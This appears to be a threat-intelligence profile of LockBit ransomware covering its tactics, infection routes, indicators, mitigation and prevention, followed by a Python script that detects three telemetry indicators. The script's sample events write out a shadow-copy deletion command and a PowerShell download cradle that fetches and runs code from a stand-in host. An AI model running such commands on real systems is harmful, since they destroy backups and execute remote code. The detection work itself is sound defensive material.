Critical | Active | Trending
Critical Risk: 95%
LockBit Ransomware
Affiliate-based ransomware known for fast encryption and double extortion.
#ransomware #double-extortion #windows
Threat overview
LockBit operates as a ransomware-as-a-service platform. Affiliates deploy encryptors across networks, exfiltrate sensitive data, and publish leaks to pressure victims into paying ransoms.
Attack behaviour
- Mass file encryption using hybrid AES + RSA schemes
- Shadow copy and backup service deletion
- Data exfiltration prior to encryption for double extortion
- Lateral movement via stolen credentials and RDP
Infection methods
- Phishing attachments
- Exploited VPN or RDP endpoints
- Malicious email links
- Supply-chain compromise
Symptoms and indicators
- Renamed files with unusual extensions
- Ransom notes on desktops
- Disabled recovery tools
- Unexpected network traffic spikes
Immediate mitigation
- Isolate affected endpoints immediately
- Preserve forensic images before cleanup
- Notify legal and incident response teams
- Do not pay ransom without professional guidance
Removal guide
- Boot from clean media and scan offline
- Restore from verified offline backups
- Rebuild compromised domain controllers
- Rotate all domain credentials
Prevention methods
- Enable behavioral ransomware protection
- Maintain immutable offline backups
- Patch edge services and disable unused RDP
- Enforce least-privilege access
Telemetry indicators
- Execution of vssadmin delete shadows (shadow copy removal)
- Mass .lockbit extension renames
- Suspicious PowerShell download cradle
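Detection logic for the three telemetry indicators above, as an added example that is not part of this profile or of any vendor product; the event tuple format, the regexes and the burst threshold (20 .lockbit renames on one host within 60 seconds) are assumptions, and the sample events are constructed.

```python
"""Flag the three LockBit telemetry indicators in endpoint events.
Assumed event format: (timestamp_seconds, host, event_type, detail)."""
import re
from collections import defaultdict

VSSADMIN_RE = re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b", re.I)
# A download cradle: powershell invoking one of the common fetch primitives.
CRADLE_RE = re.compile(
    r"powershell.*(downloadstring|downloadfile|invoke-webrequest|iwr\b|curl\b)",
    re.I,
)
LOCKBIT_EXT_RE = re.compile(r"\.lockbit$", re.I)
RENAME_BURST = 20   # renames to .lockbit on one host ... (assumed threshold)
RENAME_WINDOW = 60  # ... within this many seconds (assumed window)


def detect(events):
    """Return a sorted list of (host, indicator) pairs found in the events."""
    hits = set()
    renames = defaultdict(list)  # host -> timestamps of .lockbit renames
    for ts, host, kind, detail in events:
        if kind == "process":
            if VSSADMIN_RE.search(detail):
                hits.add((host, "shadow-copy-deletion"))
            if CRADLE_RE.search(detail):
                hits.add((host, "powershell-download-cradle"))
        elif kind == "rename" and LOCKBIT_EXT_RE.search(detail):
            renames[host].append(ts)
    # Sliding window: a single rename is noise, a burst is the encryptor.
    for host, stamps in renames.items():
        stamps.sort()
        start = 0
        for end, t in enumerate(stamps):
            while t - stamps[start] > RENAME_WINDOW:
                start += 1
            if end - start + 1 >= RENAME_BURST:
                hits.add((host, "mass-lockbit-rename"))
                break
    return sorted(hits)


# Constructed sample: ws01 is infected; ws02 has one stray rename (no burst).
SAMPLE = [
    (1000, "ws01", "process", "cmd.exe /c vssadmin delete shadows /all /quiet"),
    (1001, "ws01", "process", "powershell.exe -nop -w hidden -c IEX "
                              "(New-Object Net.WebClient).DownloadString('http://example.invalid/x')"),
    (1002, "ws02", "rename", "C:\\Users\\bob\\notes.txt -> C:\\Users\\bob\\notes.txt.lockbit"),
] + [(1003 + i, "ws01", "rename", f"C:\\data\\f{i}.docx -> C:\\data\\f{i}.docx.lockbit")
     for i in range(25)]

if __name__ == "__main__":
    for host, indicator in detect(SAMPLE):
        print(f"{host}: {indicator}")
```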
LockBit campaigns continue through affiliate networks despite law-enforcement disruptions. Treat it as an active high-risk family.